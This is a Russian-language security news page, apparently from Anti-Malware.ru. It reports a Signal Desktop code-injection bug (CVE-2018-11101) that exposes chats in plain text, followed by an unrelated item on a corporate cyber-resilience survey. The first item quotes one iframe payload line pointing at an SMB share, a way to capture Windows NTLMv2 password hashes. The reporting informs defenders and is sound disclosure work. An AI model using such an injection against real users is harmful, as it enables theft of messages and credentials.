Новый баг в Signal позволяет получить переписку в виде простого текста

Новый баг в Signal позволяет получить переписку в виде простого текста

Новый баг в Signal позволяет получить переписку в виде простого текста

Второй раз за неделю пользователям приложения для обмена сообщениями Signal придется обновлять свои инсталляции программы, так как разработчики устранили еще одну серьезную уязвимость, способную привести к инъекции злонамеренного кода.

Для эксплуатации этого бага злоумышленнику нужно всего лишь отправить специальное текстовое сообщение на десктопную версию мессенджера. При этом взаимодействие с пользователем совершенно не требуется.

Новая уязвимость получила идентификатор CVE-2018-11101, она находится в функции, отвечающей за проверку цитируемых сообщений.

Другими словами, все, что потребуется злоумышленнику, — отправить вредоносный код HTML-JavaScript в качестве сообщения жертве, а затем процитировать — и, соответственно, ответить — на это сообщение случайным текстом.

Получив это сообщение, настольная версия клиента Signal выполнит вредоносную составляющую без всякого взаимодействия с пользователем. Эксперты опубликовали видео, на котором демонстрируется успешная атака на Signal.

Исследователям также удалось создать новый PoC-эксплойт, который позволяет удаленно похитить все беседы жертвы в Signal. Причем эти беседы будут получены злоумышленником в виде простого текста.

Стало быть, данная атака сводит на нет сквозное шифрование, применяемое в Signal.

Но и это еще не все. Специалисты отметили, что злоумышленник может подключить файлы, используя тег iFrame и попытаться похитить хеш пароля NTLMv2 пользователей Windows.

«В операционной системе Windows политика защиты контента (CSP) не может предотвратить удаленное подключение файлов через SMB-протокол. В этом случае атакующий может удаленно запустить JavaScript, указав его в качестве источника в теге iframe, например: <iframe src=\\DESKTOP-XXXXX\Temp\test.html>», — пишут исследователи.

Эксперты полагают, что киберпреступник может использовать инъекцию кода, чтобы заставить Windows инициировать автоматическую проверку подлинности с SMB-сервером, что приведет к передаче имени пользователя и хеша пароля NTLMv2 атакующему.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Более 50% компаний перекладывают непрерывность на ИТ, 20% имеют план

«Инфосистемы Джет» провела масштабное исследование практик восстановления после инцидентов и выяснила: большинство российских компаний относятся к киберустойчивости фрагментарно и чаще действуют по факту, а не по плану. Ключевая мысль исследования — сегодня именно инциденты информационной безопасности и крупные ИТ-сбои чаще всего прерывают бизнес-процессы.

При этом компании по-прежнему разделяют ответственность так, что получается разрыв между операциями и стратегией.

Основные выводы исследования:

  • Более половины компаний полностью возлагают заботу о непрерывности процессов на ИТ-отдел.
  • Только 20% организаций имеют согласованный с бизнесом план восстановления ИТ-инфраструктуры.
  • 37% полагаются исключительно на резервное копирование, а каждая пятая компания не защищает резервные копии дополнительно — это оставляет их уязвимыми.
  • Кризис-менеджмент преимущественно реактивный: команды действуют по мере возникновения проблем, а не по отработанным сценариям.
  • 70% организаций тестируют планы восстановления, но почти не моделируют реальные инциденты.
  • Лишь 40% готовы публично говорить о произошедших инцидентах, что мешает формированию прозрачной культуры киберустойчивости.

Исследование подчёркивает: базовых мер часто мало. Подразделения информационной безопасности фокусируются на защите периметра, ИТ — на восстановлении систем, но редко выстраивается сквозной, комплексный подход — от предотвращения инцидента до его отработки и анализа последствий. В результате у компании может быть «крепкий» периметр и надёжные бэкапы, но при этом игнорироваться защита критических контуров вроде СРК, а плохо настроенные процессы восстановления приводят к большим потерям даже при наличии отдельных сильных элементов.

Что нужно делать дальше:

  • Внедрять BIA (анализ влияния на бизнес), оценку рисков и регулярное тестирование планов восстановления.
  • Переходить от реактивного реагирования к отработанным сценариям и моделированию реальных инцидентов.
  • Защищать резервные копии отдельно и вводить лимиты/контроли на их доступ.
  • Вовлекать весь бизнес: киберустойчивость — это не только задача службы ИБ или ИТ, это общая ответственность ИТ-отдела, бизнеса, финансов, HR и руководства.
  • Стремиться к антихрупкости — архитектуре и процессам, которые не просто выдерживают удар, но учатся и укрепляются после инцидента.

«Главное отличие компаний, которые быстро восстанавливаются после кибератаки, — они готовились заранее», — говорит Андрей Янкин, директор центра информационной безопасности «Инфосистемы Джет». «Почти никогда не получается восстановиться с первого раза, если это ни разу не отрабатывалось на практике. Нужно проводить учения, моделировать атаки, проверять коммуникации и распределение ролей. И самое важное — вовлечённость всей компании: киберустойчивость невозможна, если в ней участвует только служба ИБ».

В итоге исследование показывает, что переход от точечных мер к стратегическому, системному подходу — не прихоть, а необходимость. Компании, которые начнут системно оценивать риски, тестировать сценарии и вовлекать все подразделения, будут восстанавливаться быстрее и получать меньше ущерба от будущих инцидентов.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru